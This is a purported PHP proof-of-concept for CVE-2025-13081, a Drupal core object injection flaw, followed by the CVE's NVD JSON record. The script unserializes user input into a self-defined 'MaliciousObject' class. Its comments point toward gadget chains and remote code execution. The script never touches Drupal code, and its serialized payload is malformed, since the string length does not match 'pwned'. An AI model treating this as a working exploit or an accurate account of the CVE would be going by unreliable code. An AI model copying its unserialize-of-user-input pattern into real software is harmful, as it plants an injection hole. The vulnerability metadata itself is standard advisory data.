CVE-2025-13081

<?php // CVE-2025-13081 Drupal Core Object Injection PoC // This PoC demonstrates the object injection vulnerability in Drupal Core // Note: This is for educational and testing purposes only class MaliciousObject { public $evilProp; function __construct() { $this->evilProp = 'malicious_value'; } // Magic method triggered on unserialize function __wakeup() { // Malicious code execution point // In real attack, this could execute system commands error_log("Object injected: " . $this->evilProp); } function __destruct() { // Additional exploitation vector if (isset($this->evilProp)) { // Potential command execution or data exfiltration } } } // Simulate vulnerable Drupal component that unserialize user input function vulnerable_unserialize($user_input) { // In Drupal, this could be in cached data, form submissions, or API responses return unserialize($user_input); } // Example malicious serialized payload $malicious_payload = 'O:15:"MaliciousObject":1:{s:9:"evilProp";s:10:"pwned";}'; // Trigger the vulnerability (in real scenario, this would be done via Drupal's input handling) try { $result = vulnerable_unserialize($malicious_payload); // Object is now instantiated and magic methods are triggered } catch (Exception $e) { echo "Error: " . $e->getMessage(); } // In real Drupal exploitation, attackers would chain this with: // 1. Finding gadget chains in Drupal's class hierarchy // 2. Using Symfony or Drupals own classes as gadgets // 3. Achieving RCE through chain execution ?>

{"cve": {"id": "CVE-2025-13081", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:15:58.987", "lastModified": "2025-11-24T17:43:15.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection.This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-915"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "10.4.9", "matchCriteriaId": "187161BC-CF72-4A12-9DA7-637A024DD97A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.6", "matchCriteriaId": "6637885B-CE3E-4FCE-9899-A21BA12F6C87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.1.9", "matchCriteriaId": "A80C15FD-FB6B-4E22-B836-8A18842BEED0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.8", "matchCriteriaId": "4D477FF8-4E52-43B9-8799-36DAEB8524E0"}]}]}], "references": [{"url": "https://www.drupal.org/sa-core-2025-006", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}